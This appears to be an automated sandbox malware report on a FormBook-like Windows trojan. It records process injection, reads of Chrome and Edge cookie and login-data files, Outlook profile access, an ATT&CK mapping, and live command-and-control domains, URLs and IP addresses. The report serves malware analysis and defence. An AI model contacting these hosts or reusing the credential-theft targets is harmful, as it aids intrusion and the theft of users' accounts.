            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
            Source: H1CYDJ8LQe.exe; Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\dvdplay.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\dvdplay.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: H1CYDJ8LQe.exe; Binary or memory string: WIN_XP
            Source: H1CYDJ8LQe.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: H1CYDJ8LQe.exe; Binary or memory string: WIN_XPe
            Source: H1CYDJ8LQe.exe; Binary or memory string: WIN_VISTA
            Source: H1CYDJ8LQe.exe; Binary or memory string: WIN_7
            Source: H1CYDJ8LQe.exe; Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe; Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject

            ATT&CK Matrix (one entry per tactic column; the number in parentheses is the count the matrix shows against that technique)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1549376, Sample: H1CYDJ8LQe.exe, Startdate: 05/11/2024, Architecture: WINDOWS, Score: 100)

Start node (2):
• DNS/IP: www.030002832.xyz; www.sortcy.top; 13 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
• Signature on www.030002832.xyz: Performs DNS queries to domains with low reputation
• started: H1CYDJ8LQe.exe 1 (10)

H1CYDJ8LQe.exe (10):
• Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
• started: svchost.exe (13)

svchost.exe (13):
• Signature: Maps a DLL or memory area into another process
• injected: SwTeWVAxKdsP.exe (16)

SwTeWVAxKdsP.exe (16):
• Signature: Found direct / indirect Syscall (likely to bypass EDR)
• started: dvdplay.exe 13 (19)

dvdplay.exe (19):
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• injected: SwTeWVAxKdsP.exe (22)
• started: firefox.exe (26)

SwTeWVAxKdsP.exe (22):
• DNS/IP: www.sortcy.top 184.94.215.26 (ports 50032, 50033, 50034) VXCHNGE-NC01US, United States; www.onlineblikje.online 213.249.67.10 (ports 49772, 49783, 49798) METAREGISTRARNL, Netherlands; 4 other IPs or domains
• Signature: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
H1CYDJ8LQe.exe | 39% | ReversingLabs | Win32.Trojan.ShellcodeCrypter
H1CYDJ8LQe.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.bearableguy.net/m3fv/ | 0% | Avira URL Cloud | safe
http://www.bearableguy.net | 0% | Avira URL Cloud | safe
http://www.onlineblikje.online/qmow/ | 0% | Avira URL Cloud | safe
http://www.meliorahomes.net/y4rz/ | 0% | Avira URL Cloud | safe
http://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
http://www.sortcy.top/sm4f/ | 0% | Avira URL Cloud | safe
http://www.it2sp8.vip/r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56s | 0% | Avira URL Cloud | safe
http://www.ninesquare.games/4oy8/ | 0% | Avira URL Cloud | safe
http://www.030002832.xyz/l9k5/ | 0% | Avira URL Cloud | safe
http://www.bandukchi.com/5lco/ | 0% | Avira URL Cloud | safe
http://www.s9gzg9.vip/bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= | 0% | Avira URL Cloud | safe
http://www.bandukchi.com/5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB | 0% | Avira URL Cloud | safe
http://www.ninesquare.games/4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
http://www.meliorahomes.net/y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
http://www.onlineblikje.online/qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
http://www.030002832.xyz/l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc | 0% | Avira URL Cloud | safe
http://www.s9gzg9.vip/bawd/ | 0% | Avira URL Cloud | safe
http://www.bdipjg.asia/mszq/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
it2sp8.vip | 3.33.130.190 | true | true | unknown
www.bdipjg.asia | 78.141.202.204 | true | true | unknown
s9gzg9.vip | 3.33.130.190 | true | true | unknown
www.030002832.xyz | 161.97.142.144 | true | true | unknown
www.onlineblikje.online | 213.249.67.10 | true | true | unknown
bandukchi.com | 3.33.130.190 | true | true | unknown
www.meliorahomes.net | 8.217.17.192 | true | true | unknown
www.sortcy.top | 184.94.215.26 | true | true | unknown
ninesquare.games | 3.33.130.190 | true | true | unknown
bearableguy.net | 3.33.130.190 | true | true | unknown
www.s9gzg9.vip | unknown | unknown | true | unknown
www.bearableguy.net | unknown | unknown | true | unknown
www.bandukchi.com | unknown | unknown | true | unknown
www.ninesquare.games | unknown | unknown | true | unknown
www.it2sp8.vip | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.meliorahomes.net/y4rz/ | true | Avira URL Cloud: safe | unknown
http://www.onlineblikje.online/qmow/ | true | Avira URL Cloud: safe | unknown
http://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.sortcy.top/sm4f/ | true | Avira URL Cloud: safe | unknown
http://www.ninesquare.games/4oy8/ | true | Avira URL Cloud: safe | unknown
http://www.bearableguy.net/m3fv/ | true | Avira URL Cloud: safe | unknown
http://www.030002832.xyz/l9k5/ | true | Avira URL Cloud: safe | unknown
http://www.it2sp8.vip/r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.meliorahomes.net/y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.ninesquare.games/4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.s9gzg9.vip/bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= | true | Avira URL Cloud: safe | unknown
http://www.bandukchi.com/5lco/ | true | Avira URL Cloud: safe | unknown
http://www.onlineblikje.online/qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.bandukchi.com/5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.030002832.xyz/l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc | true | Avira URL Cloud: safe | unknown
http://www.s9gzg9.vip/bawd/ | true | Avira URL Cloud: safe | unknown
http://www.bdipjg.asia/mszq/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56s | dvdplay.exe, 00000003.00000002.3527827023.0000000004298000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.0000000002EC8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.bearableguy.net | SwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB | dvdplay.exe, 00000003.00000002.3527827023.0000000004A72000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.00000000036A2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
8.217.17.192 | www.meliorahomes.net | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
213.249.67.10 | www.onlineblikje.online | Netherlands | 42585 | METAREGISTRARNL | true
161.97.142.144 | www.030002832.xyz | United States | 51167 | CONTABODE | true
184.94.215.26 | www.sortcy.top | United States | 394896 | VXCHNGE-NC01US | true
3.33.130.190 | it2sp8.vip | United States | 8987 | AMAZONEXPANSIONGB | true
78.141.202.204 | www.bdipjg.asia | France | 20473 | AS-CHOOPAUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549376
Start date and time: 2024-11-05 15:40:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: H1CYDJ8LQe.exe (renamed because original name is a hash value)
Original Sample Name: ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@10/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 50
• Number of non-executed functions: 307
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SwTeWVAxKdsP.exe, PID 2020 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: H1CYDJ8LQe.exe
Time | Type | Description
09:42:44 | API Interceptor | 6882399x Sleep call for process: dvdplay.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
8.217.17.192 | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | www.meliorahomes.net/x0tl/
8.217.17.192 | shipping documents_pdf.exe | malicious | FormBook | www.meliorahomes.net/v6hi/
213.249.67.10 | VkTNb6p288.exe | malicious | FormBook | www.onlineblikje.online/w27a/
213.249.67.10 | QUOTE2342534.exe | malicious | FormBook | www.onlineblikje.online/z0t0/
213.249.67.10 | PO#001498.exe | malicious | FormBook | www.onlineblikje.online/wp9q/?74=Wcq5nto4Pys/VvLEf2lJ/6Zw/QsAH/mOKDhTh8E2UkIGdNowS/NkUBtnEOdEZ1QRI1rqIZGZ3d2iBtPWddII6c2xOxLt6j8Q/ledcZJmmPQke33bUPdbyjY=&jf=kjpL5
213.249.67.10 | PO59458.exe | malicious | FormBook | www.onlineblikje.online/mgmi/
161.97.142.144 | p4rsJEIb7k.exe | malicious | FormBook | www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
161.97.142.144 | r6lOHDg9N9.exe | malicious | FormBook | www.030002304.xyz/jkxr/
161.97.142.144 | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook | www.030002059.xyz/4h9e/
161.97.142.144 | Ponta Saheb. PO 4400049817.exe | malicious | FormBook | www.030002107.xyz/fnq1/
161.97.142.144 | A4mmSHCUi2.exe | malicious | FormBook | www.030002107.xyz/e8he/
161.97.142.144 | VkTNb6p288.exe | malicious | FormBook | www.030002832.xyz/2nyl/
161.97.142.144 | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | www.030002803.xyz/o3vr/
161.97.142.144 | Payment&WarantyBonds.exe | malicious | FormBook | www.030002059.xyz/2sun/
161.97.142.144 | Viridine84.exe | malicious | FormBook, GuLoader | www.030003548.xyz/ochg/
161.97.142.144 | Payment&WarantyBonds.exe | malicious | FormBook | www.030002059.xyz/2sun/
184.94.215.26 | rDebitadvice22_10_2024.exe | malicious | FormBook | www.namcist.xyz/h6bx/
184.94.215.26 | Products Order Catalogs20242.exe | malicious | FormBook | www.hellosmall.info/skre/
184.94.215.26 | Pending invoices.exe | malicious | FormBook | www.guplace.xyz/s0g5/
184.94.215.26 | SOA SIL TL382920.exe | malicious | FormBook | www.tribevas.online/io0i/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.meliorahomes.net | rInvoiceCM60916_xlx.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | shipping documents_pdf.exe | malicious | FormBook | 8.217.17.192
www.onlineblikje.online | VkTNb6p288.exe | malicious | FormBook | 213.249.67.10
